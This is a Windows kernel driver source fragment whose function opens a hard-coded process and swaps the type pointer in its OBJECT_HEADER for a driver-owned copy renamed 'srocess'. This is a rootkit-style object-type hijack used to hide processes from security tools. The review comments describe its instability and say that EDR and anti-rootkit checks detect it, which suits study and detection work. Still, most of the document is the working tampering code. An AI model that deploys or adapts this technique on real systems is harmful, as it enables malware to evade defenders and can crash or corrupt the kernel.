/*
 * Recover the OBJECT_HEADER that sits in front of an object body.
 * Assumes the header layout in which the body is the Body member of
 * OBJECT_HEADER and the header still carries a Type pointer (the layout
 * Test() below writes to). NOTE(review): that layout is build-specific —
 * verify it against the target kernel's OBJECT_HEADER before relying on it.
 */
#define OBJECT_TO_OBJECT_HEADER( o ) CONTAINING_RECORD( (o), OBJECT_HEADER, Body )
/*
 * Driver-owned copy of a process OBJECT_TYPE; Test() fills it and points a
 * process object header at it. It lives only as long as this driver image,
 * so an object still referencing it after unload holds a dangling pointer.
 */
OBJECT_TYPE g_obMyProcessTYPE;
/* Name installed on the copied type ("srocess"); 24 WCHARs, 8 used incl. the terminator. */
WCHAR g_ProcType[ 24 ] = L"srocess";
/*
 * Test: swap the object type of one process object for a driver-owned copy.
 *
 * Opens the process whose id is hard-coded into ClientId, takes a kernel
 * reference on its object body, walks back to the OBJECT_HEADER, copies the
 * header's OBJECT_TYPE into g_obMyProcessTYPE, renames the copy to g_ProcType
 * and points the header's Type at the copy. The original Type pointer is not
 * saved and is never restored.
 *
 * Review notes (risk and stability):
 *  - The header is written without any object-manager lock, and the object is
 *    left pointing into this driver's image: unloading the driver while the
 *    process still exists leaves a dangling Type pointer. On kernels that
 *    protect these structures, or whose OBJECT_HEADER carries a type index
 *    instead of a Type pointer, this write does not apply cleanly — confirm
 *    the target layout.
 *  - A process object whose type no longer matches the real process type is
 *    the signature of an object-type hijack; type/header consistency checks in
 *    anti-rootkit tooling and kernel-level EDR exist precisely to detect it.
 *
 * Side effects: overwrites g_obMyProcessTYPE and modifies the target's
 * OBJECT_HEADER. Returns nothing; failures of ZwOpenProcess and
 * ObReferenceObjectByHandle are silently skipped.
 */
VOID Test()
{
NTSTATUS ntStatus1 = STATUS_SUCCESS;// Assume success
HANDLE hProcess = NULL;
CLIENT_ID ClientId;
OBJECT_ATTRIBUTES ObjectAttributes;
PVOID pEprocess = NULL;
ClientId.UniqueProcess = (HANDLE)300; // fill in the target process id here
ClientId.UniqueThread = NULL;
// Deliberate break so the swap can be followed step by step in a kernel debugger.
DbgBreakPoint();
InitializeObjectAttributes( &ObjectAttributes, NULL, 0, NULL, NULL );
ntStatus1 = ZwOpenProcess( &hProcess, PROCESS_ALL_ACCESS, &ObjectAttributes, &ClientId );
if( NT_SUCCESS( ntStatus1 ) )
{
// ObjectType is NULL, so no object-type check is applied to the handle; the
// handle comes from ZwOpenProcess above, which only yields process objects.
ntStatus1 = ObReferenceObjectByHandle( hProcess, PROCESS_ALL_ACCESS, NULL, KernelMode, &pEprocess, NULL );
if( NT_SUCCESS( ntStatus1 ) )
{
POBJECT_HEADER pHeader = OBJECT_TO_OBJECT_HEADER( pEprocess );
// NOTE(review): the (ULONG) casts truncate pointers on 64-bit builds; %p
// would be the portable choice if DbgOutput is printf-style — confirm.
DbgOutput( "0 pHeader=%x,pType=%x,pBody=%x...", (ULONG)pHeader, (ULONG)pHeader->Type, (ULONG)pEprocess );
// Snapshot the live type so the copy behaves like the original except for its name.
RtlCopyMemory( &g_obMyProcessTYPE, pHeader->Type, sizeof(OBJECT_TYPE) );
// Modify the process type: rename the copy, then install it in the header.
RtlInitUnicodeString( &g_obMyProcessTYPE.Name, g_ProcType );
pHeader->Type = &g_obMyProcessTYPE;
DbgOutput( "1 pHeader=%x,pType=%x,pBody=%x...", (ULONG)pHeader, (ULONG)pHeader->Type, (ULONG)pEprocess );
// Drop the reference taken above; the type swap persists after this returns.
ObDereferenceObject( pEprocess );
}
ZwClose( hProcess );
}
}